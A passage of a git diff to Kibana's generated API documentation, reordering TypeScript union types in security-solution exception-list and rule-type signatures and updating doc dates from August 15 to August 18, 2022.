\"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: 
string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "packages/kbn-securitysolution-list-utils/src/build_exception_filter/index.ts", "deprecated": false 
@@ -741,7 +741,7 @@ "section": "def-common.ExceptionsBuilderExceptionItem", "text": "ExceptionsBuilderExceptionItem" }, - "[]) => ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | 
\"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "[]) => ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | 
\"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | 
\"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, 
@@ -995,7 +995,7 @@ "section": "def-common.FormattedBuilderEntry", "text": "FormattedBuilderEntry" }, - ") => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }" + ") => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, 
@@ -1137,7 +1137,7 @@ "section": "def-common.FormattedBuilderEntry", "text": "FormattedBuilderEntry" }, - ", newField: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }) => { index: number; updatedEntry: ", + ", newField: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }) => { index: number; updatedEntry: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", 
@@ -1182,7 +1182,7 @@ "- newly selected list" ], "signature": [ - "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" + "{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, 
@@ -2567,7 +2567,7 @@ "label": "hasLargeValueList", "description": [], "signature": [ - "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => boolean" + "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | 
\"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => boolean" ], "path": "packages/kbn-securitysolution-list-utils/src/has_large_value_list/index.ts", "deprecated": false, 
@@ -2580,7 +2580,7 @@ "label": "entries", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { 
field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/has_large_value_list/index.ts", "deprecated": false, 
@@ -3229,7 +3229,7 @@ "label": "BuilderEntry", "description": [], "signature": [ - "(({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }) | ", + "(({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }) & { id?: string | undefined; }) | ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", 
@@ -3288,7 +3288,7 @@ "label": "CreateExceptionListItemBuilderSchema", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"meta\" | \"entries\"> & { meta: { temporaryUuid: string; }; entries: ", + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | 
\"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"meta\" | \"entries\"> & { meta: { temporaryUuid: string; }; entries: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", 
@@ -3422,7 +3422,7 @@ "label": "ExceptionListItemBuilderSchema", "description": [], "signature": [ - "Omit<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }, \"entries\"> & { entries: ", + "Omit<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; 
created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }, \"entries\"> & { entries: ", { "pluginId": "@kbn/securitysolution-list-utils", "scope": "common", diff --git a/api_docs/kbn_securitysolution_list_utils.mdx b/api_docs/kbn_securitysolution_list_utils.mdx index 8bdbb6e312450..550abeab397a4 100644 --- a/api_docs/kbn_securitysolution_list_utils.mdx +++ b/api_docs/kbn_securitysolution_list_utils.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-utils title: "@kbn/securitysolution-list-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-utils'] --- import kbnSecuritysolutionListUtilsObj from './kbn_securitysolution_list_utils.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_rules.devdocs.json b/api_docs/kbn_securitysolution_rules.devdocs.json index f7c30d88d58f1..1617a860e2a7b 100644 --- a/api_docs/kbn_securitysolution_rules.devdocs.json +++ b/api_docs/kbn_securitysolution_rules.devdocs.json @@ -72,7 +72,7 @@ "label": "isRuleType", "description": [], "signature": [ - "(ruleType: unknown) => ruleType is \"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "(ruleType: unknown) => ruleType is \"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-rules/src/utils.ts", "deprecated": false, @@ -231,7 +231,7 @@ "label": "RuleType", "description": [], "signature": [ - "\"eql\" | \"query\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" + "\"query\" | \"eql\" | \"threshold\" | \"machine_learning\" | \"saved_query\" | \"threat_match\" | \"new_terms\"" ], "path": "packages/kbn-securitysolution-rules/src/rule_type_mappings.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_rules.mdx b/api_docs/kbn_securitysolution_rules.mdx index c93b822e3b715..4b0c48b7424b7 100644 --- a/api_docs/kbn_securitysolution_rules.mdx +++ b/api_docs/kbn_securitysolution_rules.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-rules title: "@kbn/securitysolution-rules" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-rules plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-rules'] --- import kbnSecuritysolutionRulesObj from './kbn_securitysolution_rules.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_t_grid.mdx b/api_docs/kbn_securitysolution_t_grid.mdx index df56a5e4f2798..dafe77c50b0a8 100644 --- a/api_docs/kbn_securitysolution_t_grid.mdx +++ b/api_docs/kbn_securitysolution_t_grid.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-t-grid title: "@kbn/securitysolution-t-grid" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-t-grid plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-t-grid'] --- import kbnSecuritysolutionTGridObj from './kbn_securitysolution_t_grid.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_utils.mdx b/api_docs/kbn_securitysolution_utils.mdx index 142f19846129a..e47d2bae61f7c 100644 --- a/api_docs/kbn_securitysolution_utils.mdx +++ b/api_docs/kbn_securitysolution_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-utils title: "@kbn/securitysolution-utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-utils'] --- import kbnSecuritysolutionUtilsObj from './kbn_securitysolution_utils.devdocs.json'; diff --git a/api_docs/kbn_server_http_tools.devdocs.json b/api_docs/kbn_server_http_tools.devdocs.json index 2f91a58cf2e7a..b3cc50d874c37 100644 --- a/api_docs/kbn_server_http_tools.devdocs.json +++ b/api_docs/kbn_server_http_tools.devdocs.json 
@@ -793,7 +793,7 @@ "Type", "; clientAuthentication: ", "Type", - "<\"none\" | \"required\" | \"optional\">; }>" + "<\"optional\" | \"none\" | \"required\">; }>" ], "path": "packages/kbn-server-http-tools/src/ssl/ssl_config.ts", "deprecated": false, diff --git a/api_docs/kbn_server_http_tools.mdx b/api_docs/kbn_server_http_tools.mdx index 0241145158e2f..e78c5bdf707e6 100644 --- a/api_docs/kbn_server_http_tools.mdx +++ b/api_docs/kbn_server_http_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-server-http-tools title: "@kbn/server-http-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/server-http-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/server-http-tools'] --- import kbnServerHttpToolsObj from './kbn_server_http_tools.devdocs.json'; diff --git a/api_docs/kbn_server_route_repository.mdx b/api_docs/kbn_server_route_repository.mdx index 84b972f37420c..5aac51db5a81a 100644 --- a/api_docs/kbn_server_route_repository.mdx +++ b/api_docs/kbn_server_route_repository.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-server-route-repository title: "@kbn/server-route-repository" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/server-route-repository plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/server-route-repository'] --- import kbnServerRouteRepositoryObj from 